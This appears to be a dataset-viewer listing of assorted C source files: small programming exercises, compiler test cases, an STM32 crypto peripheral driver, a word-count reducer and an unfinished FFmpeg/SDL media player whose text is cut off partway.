file
stringlengths
18
26
data
stringlengths
3
1.04M
the_stack_data/874239.c
/* ************************************************ username : smmehrab fullname : s.m.mehrabul islam email : [email protected] institute : university of dhaka, bangladesh session : 2017-2018 ************************************************ */ #include<stdio.h> int swap(int *a,int *b) { int t; t=*b; *b=*a; *a=t; } int main() { int n,a,b,c,i,j,k,na,nb,nc,answer; scanf("%d %d %d %d",&n,&a,&b,&c); if(a>b) swap(&a,&b); if(a>c) swap(&a,&c); if(b>c) swap(&b,&c); na=(n/a); nb=(n/b); answer=0; for(i=0;i<=nb;i++) { for(j=0;j<=na;j++) { if((i*b)+(j*a)>n) break; else { if((n-(i*b+j*a))%c==0) k=j+i+((n-(i*b+j*a))/c); if(k>answer) answer=k; } } } printf("%d\n",answer); return 0; }
the_stack_data/67326247.c
#include<stdio.h> int main(void) { int inum; for(inum = 1; inum <= 10; inum++) { // skip remaining code in loop only if inum ==5 if(inum == 5) break; printf("%d ", inum); } printf("\nused continue to skip printing the value 5\n"); return 0; }
the_stack_data/184516855.c
#include <stdio.h> int main() { // Declaración de variables int a = 5; // a -> [0x000 | 5] : El valor se almacena en una dirección de memoria. int b = a; // b -> [0x004 | 5] : La variable almacena (copia) el valor almacenado en a. Lo mismo que: [int b = 5;] printf("Valor de a: %i\n", a); printf("Valor de b: %i\n", b); // Punteros int *ptr_a = &a; // ptr_a -> [0x008 | 0x000] : El puntero (*) almacena la dirección de memoria de 'a' (&a). printf("Valor de ptr_a: %p\n", ptr_a); // %p -> tipo puntero. printf("Valor de *ptr_a: %i\n", *ptr_a); // *ptr -> retorna el valor almacenado en la dirección a la que apunta. /* +---------+-------------------+ | operador| descripcion | +---------+-------------------+ | &a | mem_addr | | *a | value in &a | +---------+-------------------+ */ int *ptr_x = ptr_a; // Se le asigna el valor de ptr_a. Por lo tanto, ahora ambos punteros apunta a la dirección de "a". printf("Valor de ptr_x: %p\n", ptr_x); int ptrs_are_equal = (ptr_a == ptr_x) && (ptr_a == &a); printf("Los valores son iguales?: %i\n", ptrs_are_equal); // 1: true, 0: false. // a: [ 0x0 | 5] // b: [ 0x4 | 5] // ptr_a: [ 0x8 | 0x0] // ptr_x: [ 0xC | 0x0] // Se pueden realizar cambios *ptr_a = 12; printf("Valor de a: %i\n", a); }
the_stack_data/69754.c
/* PR optimization/11381 */ /* Originator: <[email protected]> */ /* { dg-do compile { target i?86-*-* x86_64-*-* } } */ /* { dg-options "-O" } */ /* Verify that the comparison is not optimized away. */ void foo(volatile unsigned int *vaddr) { while (*vaddr != *vaddr) ; } /* { dg-final { scan-assembler "cmp" } } */
the_stack_data/25137942.c
/** \file wc.reducer.c \brief Example for KMR shell command pipeline. It is a reducer for word count. */ #include <stdio.h> #include <string.h> #include <stdlib.h> /** Maximum line length. */ #define LINELEN 32767 /** Maximum key-value string length. */ #define KEYLEN 32767 /** Reducer main routine. Read stdin and reduce. Write result to stdout. */ int main(int argc, char *argv[]) { char line[LINELEN], prevkey[KEYLEN]; char *key = NULL; long sum = 0; memset(prevkey, 0, sizeof(prevkey)); while (fgets(line, sizeof(line), stdin) != NULL) { char *cp = line; int len = (int)strlen(line); long count; // chomp if (cp[len-1] == '\n') { cp[len-1] = '\0'; } key = line; cp = strchr(line, ' '); if (cp == NULL) { // No value field. //printf("skip line\n"); continue; } *cp++ = '\0'; count = 0; while (cp - line < len) { long val; char *endptr = NULL; val = strtol(cp, &endptr, 10); if (val == 0 && cp == endptr) { // no value field. break; } count += val; cp = endptr; } if (strlen(prevkey) == 0) { // No saved key. memset(prevkey, sizeof(prevkey), 0); // save key. strncpy(prevkey, key, sizeof(prevkey)-1); sum = count; continue; } if (strcmp(prevkey, key) != 0) { // key changed. printf("%s %ld\n", prevkey, sum); memset(prevkey, sizeof(prevkey), 0); // save 'current' key. strncpy(prevkey, key, sizeof(prevkey)-1); sum = count; } else { // continue with same key. Add count. sum += count; } } if (strlen(prevkey) > 0) { printf("%s %ld\n", prevkey, sum); } fflush(stdout); return 0; }
the_stack_data/237643156.c
#include <stdio.h> int main() { float valorLido; printf("Insira o valor bruto: "); scanf("%f", &valorLido); if(valorLido <= 100.00) printf("O valor com desconto é %g\n", valorLido - (valorLido / 100)); else if (valorLido > 100.00 && valorLido <= 500.00) printf("O valor com desconto é %g\n", valorLido - ((valorLido / 100) * 5)); else printf("O valor com desconto é %g\n", valorLido - ((valorLido / 100) * 10)); }
the_stack_data/153268858.c
#include <stdio.h> int GCD(int x, int y){ if (y==0) return x; return GCD(y, x % y); } int main(void) { printf("%d", GCD(12, 3)); return 0; }
the_stack_data/175143151.c
/* { dg-do run } */ /* { dg-options "-march=x86-64 -msse4 -mfma4" } */ extern void abort (void); int main () { #if !defined __SSE__ abort (); #endif #if !defined __SSE2__ abort (); #endif #if !defined __SSE3__ abort (); #endif #if !defined __SSSE3__ abort (); #endif #if !defined __SSE4_1__ abort (); #endif #if !defined __SSE4_2__ abort (); #endif #if !defined __SSE4A__ abort (); #endif #if !defined __AVX__ abort (); #endif #if !defined __FMA4__ abort (); #endif return 0; }
the_stack_data/89212.c
/* * Write a program that reads the radius r of a circle and prints its * perimeter and area formatted with 2 digits after the decimal point. Examples: r perimeter area 2 12.57 12.57 3.5 21.99 38.48 */ #include <stdio.h> #define PI 3.14 int main() { double radius, area, perimeter; printf("Please enter the radius of a circle: "); scanf("%lf", &radius); area = PI * radius * radius; perimeter = 2 * PI * radius; printf("Area of the circle with radius %.2f is: %.2f\n", radius, area); printf("Perimeter of the circle with radius %.2f is: %.2f\n", radius, perimeter); return 0; }
the_stack_data/61074254.c
/** ****************************************************************************** * @file stm32u5xx_ll_pka.c * @author MCD Application Team * @brief PKA LL module driver. ****************************************************************************** * @attention * * Copyright (c) 2021 STMicroelectronics. * All rights reserved. * * This software is licensed under terms that can be found in the LICENSE file * in the root directory of this software component. * If no LICENSE file comes with this software, it is provided AS-IS. * ****************************************************************************** */ #if defined(USE_FULL_LL_DRIVER) /* Includes ------------------------------------------------------------------*/ #include "stm32u5xx_ll_pka.h" #include "stm32u5xx_ll_bus.h" #ifdef USE_FULL_ASSERT #include "stm32_assert.h" #else #define assert_param(expr) ((void)0U) #endif /* USE_FULL_ASSERT */ /** @addtogroup STM32U5xx_LL_Driver * @{ */ #if defined(PKA) /** @addtogroup PKA_LL * @{ */ /* Private types -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private constants ---------------------------------------------------------*/ /* Private macros ------------------------------------------------------------*/ /** @defgroup PKA_LL_Private_Macros PKA Private Constants * @{ */ #define IS_LL_PKA_MODE(__VALUE__) (((__VALUE__)== LL_PKA_MODE_MODULAR_EXP) ||\ ((__VALUE__) == LL_PKA_MODE_MONTGOMERY_PARAM) ||\ ((__VALUE__) == LL_PKA_MODE_MODULAR_EXP_FAST) ||\ ((__VALUE__) == LL_PKA_MODE_MODULAR_EXP_PROTECT) ||\ ((__VALUE__) == LL_PKA_MODE_ECC_MUL) ||\ ((__VALUE__) == LL_PKA_MODE_ECC_COMPLETE_ADD) ||\ ((__VALUE__) == LL_PKA_MODE_ECDSA_SIGNATURE) ||\ ((__VALUE__) == LL_PKA_MODE_ECDSA_VERIFICATION) ||\ ((__VALUE__) == LL_PKA_MODE_POINT_CHECK) ||\ ((__VALUE__) == LL_PKA_MODE_RSA_CRT_EXP) ||\ ((__VALUE__) == LL_PKA_MODE_MODULAR_INV) ||\ ((__VALUE__) == LL_PKA_MODE_ARITHMETIC_ADD) ||\ ((__VALUE__) == LL_PKA_MODE_ARITHMETIC_SUB) ||\ ((__VALUE__) == LL_PKA_MODE_ARITHMETIC_MUL) ||\ ((__VALUE__) == LL_PKA_MODE_COMPARISON) ||\ ((__VALUE__) == LL_PKA_MODE_MODULAR_REDUC) ||\ ((__VALUE__) == LL_PKA_MODE_MODULAR_ADD) ||\ ((__VALUE__) == LL_PKA_MODE_MODULAR_SUB) ||\ ((__VALUE__) == LL_PKA_MODE_MONTGOMERY_MUL) ||\ ((__VALUE__) == LL_PKA_MODE_DOUBLE_BASE_LADDER) ||\ ((__VALUE__) == LL_PKA_MODE_ECC_PROJECTIVE_AFF)) /** * @} */ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @addtogroup PKA_LL_Exported_Functions * @{ */ /** @addtogroup PKA_LL_EF_Init * @{ */ /** * @brief De-initialize PKA registers (Registers restored to their default values). * @param PKAx PKA Instance. * @retval ErrorStatus * - SUCCESS: PKA registers are de-initialized * - ERROR: PKA registers are not de-initialized */ ErrorStatus LL_PKA_DeInit(PKA_TypeDef *PKAx) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_PKA_ALL_INSTANCE(PKAx)); if (PKAx == PKA) { /* Force PKA reset */ LL_AHB2_GRP1_ForceReset(LL_AHB2_GRP1_PERIPH_PKA); /* Release PKA reset */ LL_AHB2_GRP1_ReleaseReset(LL_AHB2_GRP1_PERIPH_PKA); } else { status = ERROR; } return (status); } /** * @brief Initialize PKA registers according to the specified parameters in PKA_InitStruct. * @param PKAx PKA Instance. * @param PKA_InitStruct pointer to a @ref LL_PKA_InitTypeDef structure * that contains the configuration information for the specified PKA peripheral. * @retval ErrorStatus * - SUCCESS: PKA registers are initialized according to PKA_InitStruct content * - ERROR: Not applicable */ ErrorStatus LL_PKA_Init(PKA_TypeDef *PKAx, LL_PKA_InitTypeDef *PKA_InitStruct) { assert_param(IS_PKA_ALL_INSTANCE(PKAx)); assert_param(IS_LL_PKA_MODE(PKA_InitStruct->Mode)); LL_PKA_Config(PKAx, PKA_InitStruct->Mode); return (SUCCESS); } /** * @brief Set each @ref LL_PKA_InitTypeDef field to default value. * @param PKA_InitStruct pointer to a @ref LL_PKA_InitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_PKA_StructInit(LL_PKA_InitTypeDef *PKA_InitStruct) { /* Reset PKA init structure parameters values */ PKA_InitStruct->Mode = LL_PKA_MODE_MODULAR_EXP; } /** * @} */ /** * @} */ /** * @} */ #endif /* defined (PKA) */ /** * @} */ #endif /* USE_FULL_LL_DRIVER */
the_stack_data/178265526.c
extern int bar(void); short s; int foo(void) { s = bar(); return s; }
the_stack_data/181394387.c
#include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(void) { if(symlink("test.txt", "symbol_link") == -1){ /* 创建一个符号链接 */ perror("fail to create symbol link"); exit(1); } printf("create a new symbol-link\n"); /* 输出提示信息 */ return 0; }
the_stack_data/605177.c
/* Title : Sorting Array of Strings Category : Functions Author : arsho Created : 02 May 2020 */ #include <stdio.h> #include <stdlib.h> #include <string.h> int get_number_of_distinct_characters(const char* a){ int is_letter_used[26] = {0}; int i, total_distinct_characters = 0; for(i=0;i<strlen(a);i++){ if(a[i]>='a' && a[i]<='z') is_letter_used[a[i]-'a']=1; } for(i=0;i<26;i++){ total_distinct_characters += is_letter_used[i]; } return total_distinct_characters; } int lexicographic_sort(const char* a, const char* b) { return strcmp(a, b); } int lexicographic_sort_reverse(const char* a, const char* b) { return strcmp(b, a); } int sort_by_number_of_distinct_characters(const char* a, const char* b) { int i; int distinct_characters_a = get_number_of_distinct_characters(a); int distinct_characters_b = get_number_of_distinct_characters(b); //printf("%s %d, %s %d\n", a, unique_a_total, b, unique_b_total); if(distinct_characters_a == distinct_characters_b){ return lexicographic_sort(a, b); } return distinct_characters_a > distinct_characters_b; } int sort_by_length(const char* a, const char* b) { int strlen_a = strlen(a); int strlen_b = strlen(b); if(strlen_a == strlen_b){ return lexicographic_sort(a, b); } return strlen_a > strlen_b; } void string_sort(char** arr,const int len,int (*cmp_func)(const char* a, const char* b)){ int i, j; for(i=0;i<len-1;i++){ for(j=i+1;j<len;j++){ if((*cmp_func)(arr[i], arr[j])>0){ char* temp; temp = arr[i]; arr[i] = arr[j]; arr[j] = temp; } } } } int main() { int n; scanf("%d", &n); char** arr; arr = (char**)malloc(n * sizeof(char*)); for(int i = 0; i < n; i++){ *(arr + i) = malloc(1024 * sizeof(char)); scanf("%s", *(arr + i)); *(arr + i) = realloc(*(arr + i), strlen(*(arr + i)) + 1); } string_sort(arr, n, lexicographic_sort); for(int i = 0; i < n; i++) printf("%s\n", arr[i]); printf("\n"); string_sort(arr, n, lexicographic_sort_reverse); for(int i = 0; i < n; i++) printf("%s\n", arr[i]); printf("\n"); string_sort(arr, n, sort_by_length); for(int i = 0; i < n; i++) printf("%s\n", arr[i]); printf("\n"); string_sort(arr, n, sort_by_number_of_distinct_characters); for(int i = 0; i < n; i++) printf("%s\n", arr[i]); printf("\n"); }
the_stack_data/45451155.c
struct s { int f; }; static int foo(struct s *s) { if (s->f) return 0; else if (!s->f) return 4; return -1; } /* * check-name: dup-cond0 * check-command: test-linearize -Wno-decl $file * * check-output-ignore * check-output-contains: select */
the_stack_data/24703.c
#include <stdio.h> #include <complex.h> #include <tgmath.h> int main() { int i = 5; complex int ci = 3+2I; double d = 3.0; complex double c = 3.0+2.0I; printf("sizeof(int)=%d\n", sizeof(i)); printf("sizeof(complex int)=%d\n", sizeof(ci)); printf("sizeof(double)=%d\n", sizeof(d)); printf("sizeof(complex double)=%d\n", sizeof(c)); }
the_stack_data/86076583.c
#if 0 // TyrannoData.c // #include "stdafx.h" // FFMPEG #define __STDC_CONSTANT_MACROS #include "libavutil\imgutils.h" #include "libavutil\samplefmt.h" #include "libavutil\timestamp.h" #include "libavcodec\avcodec.h" #include "libavformat\avformat.h" #include "libswscale\swscale.h" #include "libavutil\avconfig.h" #include "libavutil\avstring.h" static AVFormatContext *fmt_ctx_av = NULL, *fmt_ctx_sub = NULL; static AVCodecContext *video_dec_ctx = NULL, *audio_dec_ctx = NULL, *subtitle_dec_ctx = NULL; static int width, height; static enum AVPixelFormat pix_fmt; static AVStream *video_stream = NULL, *audio_stream = NULL, *subtitle_stream = NULL; static const char *src_filename_av = NULL, *src_filename_sub = NULL; static const char *video_dst_filename = NULL; static const char *audio_dst_filename = NULL; static FILE *video_dst_file = NULL; static FILE *audio_dst_file = NULL; static uint8_t *video_dst_data[4] = { NULL }; static int video_dst_linesize[4]; static int video_dst_bufsize; static int video_stream_idx = -1, audio_stream_idx = -1, subtitle_stream_idx = -1; static AVFrame *video_frame = NULL, *audio_frame = NULL; static AVPacket pkt; static int video_frame_count = 0; static int audio_frame_count = 0; /* Enable or disable frame reference counting. You are not supposed to support * both paths in your application but pick the one most appropriate to your * needs. Look for the use of refcount in this example to see what are the * differences of API usage between them. */ static int refcount = 0; struct SwsContext *sws_ctx = NULL; // SDL #include "SDL.h" #undef main //#include "SDL_thread.h" #define SDL_AUDIO_BUFFER_SIZE 1024 SDL_Window* window = NULL; SDL_Renderer* renderer = NULL; SDL_Texture* texture = NULL; Uint8 *yPlane = NULL, *uPlane = NULL, *vPlane = NULL; size_t yPlaneSz, uvPlaneSz; int uvPitch; SDL_AudioSpec wanted_spec, spec; typedef struct PacketQueue { AVPacketList *first_pkt, *last_pkt; int nb_packets; int size; SDL_mutex *mutex; SDL_cond *cond; } PacketQueue; PacketQueue audioq; void packet_queue_init(PacketQueue *q) { memset(q, 0, sizeof(PacketQueue)); q->mutex = SDL_CreateMutex(); q->cond = SDL_CreateCond(); } int packet_queue_put(PacketQueue *q, AVPacket *pkt) { AVPacketList *pkt1; if (av_dup_packet(pkt) < 0) { return -1; } pkt1 = av_malloc(sizeof(AVPacketList)); if (!pkt1) return -1; pkt1->pkt = *pkt; pkt1->next = NULL; SDL_LockMutex(q->mutex); if (!q->last_pkt) q->first_pkt = pkt1; else q->last_pkt->next = pkt1; q->last_pkt = pkt1; q->nb_packets++; q->size += pkt1->pkt.size; SDL_CondSignal(q->cond); SDL_UnlockMutex(q->mutex); return 0; } int quit = 0; static int packet_queue_get(PacketQueue *q, AVPacket *pkt, int block) { AVPacketList *pkt1; int ret; SDL_LockMutex(q->mutex); for (;;) { if (quit) { ret = -1; break; } pkt1 = q->first_pkt; if (pkt1) { q->first_pkt = pkt1->next; if (!q->first_pkt) q->last_pkt = NULL; q->nb_packets--; q->size -= pkt1->pkt.size; *pkt = pkt1->pkt; av_free(pkt1); ret = 1; break; } else if (!block) { ret = 0; break; } else { SDL_CondWait(q->cond, q->mutex); } } SDL_UnlockMutex(q->mutex); return ret; } int decode_interrupt_cb(void) { return quit; } int audio_decode_frame(AVCodecContext *aCodecCtx, uint8_t *audio_buf, int buf_size) { static uint8_t *audio_pkt_data = NULL; static int audio_pkt_size = 0; int len1, data_size = 0; for (;;) { if (quit) { return -1; } if (packet_queue_get(&audioq, &pkt, 1) < 0) { return -1; } audio_pkt_data = pkt.data; audio_pkt_size = pkt.size; /* decode audio frame */ /* send the packet with the compressed data to the decoder */ int ret = avcodec_send_packet(audio_dec_ctx, &pkt); if (ret < 0) { fprintf(stderr, "Error submitting the packet to the decoder\n"); exit(1); } /* read all the output frames (in general there may be any number of them */ //while (ret >= 0) { ret = avcodec_receive_frame(audio_dec_ctx, audio_frame); if (ret == AVERROR(EAGAIN) || ret == AVERROR_EOF) return; else if (ret < 0) { fprintf(stderr, "Error during decoding\n"); exit(1); } data_size = av_samples_get_buffer_size(NULL, audio_dec_ctx->channels, audio_frame->nb_samples, audio_dec_ctx->sample_fmt, 1); //Out Audio Param uint64_t out_channel_layout = AV_CH_LAYOUT_STEREO; //nb_samples: AAC-1024 MP3-1152 int out_nb_samples = audio_dec_ctx->frame_size; int out_sample_rate = 44100; int out_channels = av_get_channel_layout_nb_channels(out_channel_layout); //Out Buffer Size int out_buffer_size = av_samples_get_buffer_size(NULL, out_channels, out_nb_samples, AV_SAMPLE_FMT_S16, 1); int64_t in_channel_layout = av_get_default_channel_layout(audio_dec_ctx->channels); struct SwrContext *au_convert_ctx = swr_alloc_set_opts(NULL, out_channel_layout, AV_SAMPLE_FMT_S16, out_sample_rate, in_channel_layout, audio_dec_ctx->sample_fmt, audio_dec_ctx->sample_rate, 0, NULL); swr_convert(au_convert_ctx, audio_buf, audio_frame->nb_samples, (const uint8_t **)audio_frame->data, audio_frame->nb_samples); //assert(data_size <= buf_size); //memcpy(audio_buf, audio_frame->data[0], data_size); return data_size; /* int i, ch; for (i = 0; i < frame->nb_samples; i++) for (ch = 0; ch < dec_ctx->channels; ch++) fwrite(frame->data[ch] + data_size*i, 1, data_size, outfile); */ //packet_queue_put(&audioq, &pkt); //} #if 0 int got_frame = 0; len1 = avcodec_decode_audio4(aCodecCtx, &audio_frame, &got_frame, &pkt); if (len1 < 0) { /* if error, skip frame */ audio_pkt_size = 0; break; } audio_pkt_data += len1; audio_pkt_size -= len1; data_size = 0; if (got_frame) { data_size = av_samples_get_buffer_size(NULL, aCodecCtx->channels, audio_frame->nb_samples, aCodecCtx->sample_fmt, 1); //assert(data_size <= buf_size); memcpy(audio_buf, audio_frame->data[0], data_size); } if (data_size <= 0) { /* No data yet, get more frames */ continue; } /* We have data, return it and come back for more later */ return data_size; } if (pkt.data) av_free_packet(&pkt); if (quit) { return -1; } if (packet_queue_get(&audioq, &pkt, 1) < 0) { return -1; } audio_pkt_data = pkt.data; audio_pkt_size = pkt.size; #endif } #if 0 //int ret = 1; #endif } void audio_callback(void *userdata, Uint8 *stream, int len) { AVCodecContext *aCodecCtx = (AVCodecContext *)userdata; int len1, audio_size; static uint8_t audio_buf[(192000 * 3) / 2]; static unsigned int audio_buf_size = 0; static unsigned int audio_buf_index = 0; #if 1 while (len > 0) { if (audio_buf_index >= audio_buf_size) { /* We have already sent all our data; get more */ audio_size = audio_decode_frame(aCodecCtx, audio_buf, sizeof(audio_buf)); if (audio_size < 0) { /* If error, output silence */ audio_buf_size = 1024; memset(audio_buf, 0, audio_buf_size); } else { audio_buf_size = audio_size; } audio_buf_index = 0; } len1 = audio_buf_size - audio_buf_index; if (len1 > len) len1 = len; memcpy(stream, (uint8_t *)audio_buf + audio_buf_index, len1); len -= len1; stream += len1; audio_buf_index += len1; } #endif } int decode_packet() { int ret = 0; int decoded = pkt.size; if (pkt.stream_index == video_stream_idx) { /* decode video frame */ //ret = avcodec_decode_video2(video_dec_ctx, frame, got_frame, &pkt); ret = avcodec_send_packet(video_dec_ctx, &pkt); if (ret < 0) { fprintf(stderr, "Error sending a packet for decoding\n"); exit(1); } while (ret >= 0) { ret = avcodec_receive_frame(video_dec_ctx, video_frame); if (ret == AVERROR(EAGAIN) || ret == AVERROR_EOF) return 0; else if (ret < 0) { fprintf(stderr, "Error during decoding\n"); exit(1); } #if 0 printf("video_frame n:%d coded_n:%d\n", video_frame_count++, frame->coded_picture_number); /* copy decoded frame to destination buffer: * this is required since rawvideo expects non aligned data */ av_image_copy(video_dst_data, video_dst_linesize, (const uint8_t **)(frame->data), frame->linesize, pix_fmt, width, height); /* write to rawvideo file */ fwrite(video_dst_data[0], 1, video_dec_ctx->width * video_dec_ctx->height, video_dst_file); fwrite(video_dst_data[1], 1, video_dec_ctx->width * video_dec_ctx->height / 4, video_dst_file); fwrite(video_dst_data[2], 1, video_dec_ctx->width * video_dec_ctx->height / 4, video_dst_file); #endif #if 1 AVPicture pict; pict.data[0] = yPlane; pict.data[1] = uPlane; pict.data[2] = vPlane; pict.linesize[0] = video_dec_ctx->width; pict.linesize[1] = uvPitch; pict.linesize[2] = uvPitch; // Convert the image into YUV format that SDL uses sws_scale(sws_ctx, (uint8_t const * const *)video_frame->data, video_frame->linesize, 0, video_dec_ctx->height, pict.data, pict.linesize); SDL_UpdateYUVTexture( texture, NULL, yPlane, video_dec_ctx->width, uPlane, uvPitch, vPlane, uvPitch ); SDL_RenderClear(renderer); SDL_RenderCopy(renderer, texture, NULL, NULL); SDL_RenderPresent(renderer); #endif } } else if (pkt.stream_index == audio_stream_idx) { packet_queue_put(&audioq, &pkt); #if 0 /* decode audio frame */ /* send the packet with the compressed data to the decoder */ int ret = avcodec_send_packet(audio_dec_ctx, &pkt); if (ret < 0) { fprintf(stderr, "Error submitting the packet to the decoder\n"); exit(1); } /* read all the output frames (in general there may be any number of them */ while (ret >= 0) { ret = avcodec_receive_frame(audio_dec_ctx, audio_frame); if (ret == AVERROR(EAGAIN) || ret == AVERROR_EOF) return; else if (ret < 0) { fprintf(stderr, "Error during decoding\n"); exit(1); } int data_size = av_get_bytes_per_sample(audio_dec_ctx->sample_fmt); if (data_size < 0) { /* This should not occur, checking just for paranoia */ fprintf(stderr, "Failed to calculate data size\n"); exit(1); } /* int i, ch; for (i = 0; i < frame->nb_samples; i++) for (ch = 0; ch < dec_ctx->channels; ch++) fwrite(frame->data[ch] + data_size*i, 1, data_size, outfile); */ //packet_queue_put(&audioq, &pkt); } #endif } else { av_free_packet(&pkt); } return decoded; } int open_codec_context(int *stream_idx, AVCodecContext **dec_ctx, AVFormatContext *fmt_ctx, enum AVMediaType type) { int ret, stream_index; AVStream *st; AVCodec *dec = NULL; AVDictionary *opts = NULL; ret = av_find_best_stream(fmt_ctx, type, -1, -1, NULL, 0); if (ret < 0) { fprintf(stderr, "Could not find %s stream in input file '%s'\n", av_get_media_type_string(type), src_filename_av); return ret; } else { stream_index = ret; st = fmt_ctx->streams[stream_index]; /* find decoder for the stream */ dec = avcodec_find_decoder(st->codecpar->codec_id); if (!dec) { fprintf(stderr, "Failed to find %s codec\n", av_get_media_type_string(type)); return AVERROR(EINVAL); } /* Allocate a codec context for the decoder */ *dec_ctx = avcodec_alloc_context3(dec); if (!*dec_ctx) { fprintf(stderr, "Failed to allocate the %s codec context\n", av_get_media_type_string(type)); return AVERROR(ENOMEM); } /* Copy codec parameters from input stream to output codec context */ if ((ret = avcodec_parameters_to_context(*dec_ctx, st->codecpar)) < 0) { fprintf(stderr, "Failed to copy %s codec parameters to decoder context\n", av_get_media_type_string(type)); return ret; } /* Init the decoders, with or without reference counting */ av_dict_set(&opts, "refcounted_frames", refcount ? "1" : "0", 0); if ((ret = avcodec_open2(*dec_ctx, dec, &opts)) < 0) { fprintf(stderr, "Failed to open %s codec\n", av_get_media_type_string(type)); return ret; } *stream_idx = stream_index; } return 0; } int get_format_from_sample_fmt(const char **fmt, enum AVSampleFormat sample_fmt) { int i; struct sample_fmt_entry { enum AVSampleFormat sample_fmt; const char *fmt_be, *fmt_le; } sample_fmt_entries[] = { { AV_SAMPLE_FMT_U8, "u8", "u8" }, { AV_SAMPLE_FMT_S16, "s16be", "s16le" }, { AV_SAMPLE_FMT_S32, "s32be", "s32le" }, { AV_SAMPLE_FMT_FLT, "f32be", "f32le" }, { AV_SAMPLE_FMT_DBL, "f64be", "f64le" }, }; *fmt = NULL; for (i = 0; i < FF_ARRAY_ELEMS(sample_fmt_entries); i++) { struct sample_fmt_entry *entry = &sample_fmt_entries[i]; if (sample_fmt == entry->sample_fmt) { *fmt = AV_NE(entry->fmt_be, entry->fmt_le); return 0; } } fprintf(stderr, "sample format %s is not supported as output format\n", av_get_sample_fmt_name(sample_fmt)); return -1; } int main(int argc, char **argv) { int ret = 0, got_frame; src_filename_av = argv[1]; src_filename_sub = argv[2]; /* register all codecs, demux and protocols */ avdevice_register_all(); avformat_network_init(); //init_opts(); //url_set_interrupt_cb(decode_interrupt_cb); /* open input file, and allocate format context */ if (avformat_open_input(&fmt_ctx_av, src_filename_av, NULL, NULL) < 0) { fprintf(stderr, "Could not open source file %s\n", src_filename_av); exit(1); } if (avformat_open_input(&fmt_ctx_sub, src_filename_sub, NULL, NULL) < 0) { fprintf(stderr, "Could not open source file %s\n", src_filename_sub); exit(1); } /* retrieve stream information */ if (avformat_find_stream_info(fmt_ctx_av, NULL) < 0) { fprintf(stderr, "Could not find stream information\n"); exit(1); } if (avformat_find_stream_info(fmt_ctx_sub, NULL) < 0) { fprintf(stderr, "Could not find stream information\n"); exit(1); } /* open codec context */ if (open_codec_context(&video_stream_idx, &video_dec_ctx, fmt_ctx_av, AVMEDIA_TYPE_VIDEO) >= 0) { video_stream = fmt_ctx_av->streams[video_stream_idx]; video_dst_file = fopen("sample.out.yuv", "wb"); if (!video_dst_file) { fprintf(stderr, "Could not open destination file %s\n", video_dst_filename); ret = 1; goto end; } /* allocate image where the decoded image will be put */ width = video_dec_ctx->width; height = video_dec_ctx->height; pix_fmt = video_dec_ctx->pix_fmt; ret = av_image_alloc(video_dst_data, video_dst_linesize, width, height, pix_fmt, 1); if (ret < 0) { fprintf(stderr, "Could not allocate raw video buffer\n"); goto end; } video_dst_bufsize = ret; } if (open_codec_context(&audio_stream_idx, &audio_dec_ctx, fmt_ctx_av, AVMEDIA_TYPE_AUDIO) >= 0) { audio_stream = fmt_ctx_av->streams[audio_stream_idx]; audio_dst_file = fopen("sample.out.wav", "wb"); if (!audio_dst_file) { fprintf(stderr, "Could not open destination file %s\n", audio_dst_filename); ret = 1; goto end; } wanted_spec.freq = audio_dec_ctx->sample_rate; //wanted_spec.format = AV_SAMPLE_FMT_FLTP; // audio_dec_ctx->sample_fmt; wanted_spec.format = AUDIO_F32SYS; // AUDIO_S16SYS; wanted_spec.channels = audio_dec_ctx->channels; wanted_spec.silence = 0; wanted_spec.samples = SDL_AUDIO_BUFFER_SIZE; wanted_spec.callback = audio_callback; wanted_spec.userdata = audio_dec_ctx; if (SDL_OpenAudio(&wanted_spec, &spec) < 0) { fprintf(stderr, "SDL_OpenAudio: %s\n", SDL_GetError()); return -1; } } if (open_codec_context(&subtitle_stream_idx, &subtitle_dec_ctx, fmt_ctx_sub, AVMEDIA_TYPE_SUBTITLE) >= 0) { subtitle_stream = fmt_ctx_sub->streams[subtitle_stream_idx]; } /* dump input information to stderr */ av_dump_format(fmt_ctx_av, 0, src_filename_av, 0); av_dump_format(fmt_ctx_sub, 0, src_filename_sub, 0); if (!audio_stream && !video_stream) { fprintf(stderr, "Could not find audio or video stream in the input, aborting\n"); ret = 1; goto end; } #if 1 /* Initialize SDL. */ if (SDL_Init(SDL_INIT_EVERYTHING)) { fprintf(stderr, "Could not initialize SDL - %s\n", SDL_GetError()); exit(1); } /* Initialize SDL Audio. */ packet_queue_init(&audioq); SDL_PauseAudio(0); /* Create the window where we will draw. */ window = SDL_CreateWindow("SDL_RenderClear", SDL_WINDOWPOS_CENTERED, SDL_WINDOWPOS_CENTERED, video_dec_ctx->width, video_dec_ctx->height, 0); /* We must call SDL_CreateRenderer in order for draw calls to affect this window. */ renderer = SDL_CreateRenderer(window, -1, SDL_RENDERER_ACCELERATED); /* Select the color for drawing. It is set to red here. */ SDL_SetRenderDrawColor(renderer, 0, 0, 0, 255); /* Clear the entire screen to our selected color. */ SDL_RenderClear(renderer); /* Up until now everything was drawn behind the scenes. This will show the new, red contents of the window. */ SDL_RenderPresent(renderer); /* Give us time to see the window. */ SDL_Delay(100); // Allocate a place to put our YUV image on that screen texture = SDL_CreateTexture( renderer, SDL_PIXELFORMAT_YV12, SDL_TEXTUREACCESS_STREAMING, video_dec_ctx->width, video_dec_ctx->height ); if (!texture) { fprintf(stderr, "SDL: could not create texture - exiting\n"); exit(1); } // initialize SWS context for software scaling sws_ctx = sws_getContext(video_dec_ctx->width, video_dec_ctx->height, video_dec_ctx->pix_fmt, video_dec_ctx->width, video_dec_ctx->height, AV_PIX_FMT_YUV420P, SWS_BILINEAR, NULL, NULL, NULL); // set up YV12 pixel array (12 bits per pixel) yPlaneSz = video_dec_ctx->width * video_dec_ctx->height; uvPlaneSz = video_dec_ctx->width * video_dec_ctx->height / 4; yPlane = (Uint8*)malloc(yPlaneSz); uPlane = (Uint8*)malloc(uvPlaneSz); vPlane = (Uint8*)malloc(uvPlaneSz); if (!yPlane || !uPlane || !vPlane) { fprintf(stderr, "Could not allocate pixel buffers - exiting\n"); exit(1); } uvPitch = video_dec_ctx->width / 2; #endif video_frame = av_frame_alloc(); audio_frame = av_frame_alloc(); if (!video_frame || !audio_frame) { fprintf(stderr, "Could not allocate frame\n"); ret = AVERROR(ENOMEM); goto end; } /* initialize packet, 